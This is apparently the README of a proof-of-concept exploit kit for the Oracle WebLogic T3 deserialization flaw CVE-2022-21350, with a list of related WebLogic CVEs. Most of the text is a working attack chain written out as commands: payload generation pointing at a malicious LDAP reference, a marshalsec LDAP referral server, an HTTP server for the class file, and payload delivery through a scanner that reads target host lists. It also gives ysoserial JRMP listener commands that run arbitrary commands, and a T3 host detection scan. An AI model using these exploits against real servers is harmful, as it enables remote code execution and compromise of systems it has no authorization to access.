Why are there two PoCs? The one that calls `com._51pwn.hktalent.CreatJar.main(args);` is used to create the minimal payload-generator tool; once that has been created, use the other one.

Running `CVE-2022-21350_powerBy_51pwn.jar` to build the payload reports an error, but this does not affect the use of the payload.
## Other exploits

- CVE_2020_2551
- CVE_2020_2555
- CVE_2020_2883
- CVE_2020_14645
- CVE_2020_14756
- CVE_2020_14825
- CVE_2020_14841
- CVE_2021_2394
- CVE_2022_21306
- CVE_2022_21350
## How to use

1- generate payload

```shell
# start a WebLogic 12.2.1.4.0 test container, mounting a custom setDomainEnv.sh
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0
# arguments: T3 target URL, then the LDAP reference the payload points at
java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"
```

2- start ldap server

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389
```

3- start http server, for serving the class file

```shell
node httpServer.js
```

4- send payload

```shell
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more: read target hosts from the first column of T3_ver.txt via stdin
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s
```

Alternatively, use a JRMP listener (ysuserial or ysoserial):

```shell
java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"
# write the serialized gadget chain to a file instead of listening
java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser
```
## Where is the payload

```shell
cat test.ser
```
## Why an error message is printed

The error printed while running does not affect the generation of the payload, nor the effect of the payload.
## How to attack

```shell
# detect T3-enabled WebLogic hosts from list.txt with the nuclei template
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt
```
The tool supports:

- 1-weblogic ver
  - 12.1.3.0.0
  - 12.2.1.3.0
  - 12.2.1.4.0
- 2-JDK < 1.8
- 3-Server allows OOB
## How to build / merge the jar

```shell
cd lib3
# split
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar
```